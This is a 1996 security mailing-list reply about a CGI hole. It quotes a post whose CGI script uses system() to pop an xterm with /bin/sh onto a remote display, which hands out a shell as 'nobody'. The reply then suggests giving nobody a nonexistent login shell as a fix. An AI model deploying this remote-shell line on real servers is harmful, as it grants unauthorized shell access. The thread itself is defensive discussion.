[3687] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (scott hollatz)
Wed Dec 4 12:39:42 1996
From: scott hollatz <shollatz@d.umn.edu>
Date: Wed, 4 Dec 1996 08:58:28 -0600
To: www-security@ns2.rutgers.edu, fabio@cs.odu.edu
Errors-To: owner-www-security@ns2.rutgers.edu
>I was experimenting with cgi scripts when I came up with this idea:
>
>What if I have a cgi script which does the followin:
>system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
>
>I can now pop an exterm on my display as nobody.
>This way any user can gain access to the nobody account and
>have fun with it...
>
>Has this been discussed anywhere?
>Is there a fix out there?
We give 'nobody' the same login shell as anonymous ftp: /nosuchshell ,
where '/nosuchshell' is a nonexistent file. This prevents the giving an
unauthenticated shell via an xterm.
I haven't tried it with the '-e /bin/sh' switch but I expect it to fail.
--
scott hollatz internet shollatz@d.umn.edu
information services, systems telephone +1 218 726 8851
university of minnesota-duluth mn usa fax +1 218 726 7674
"change is a universal constant"
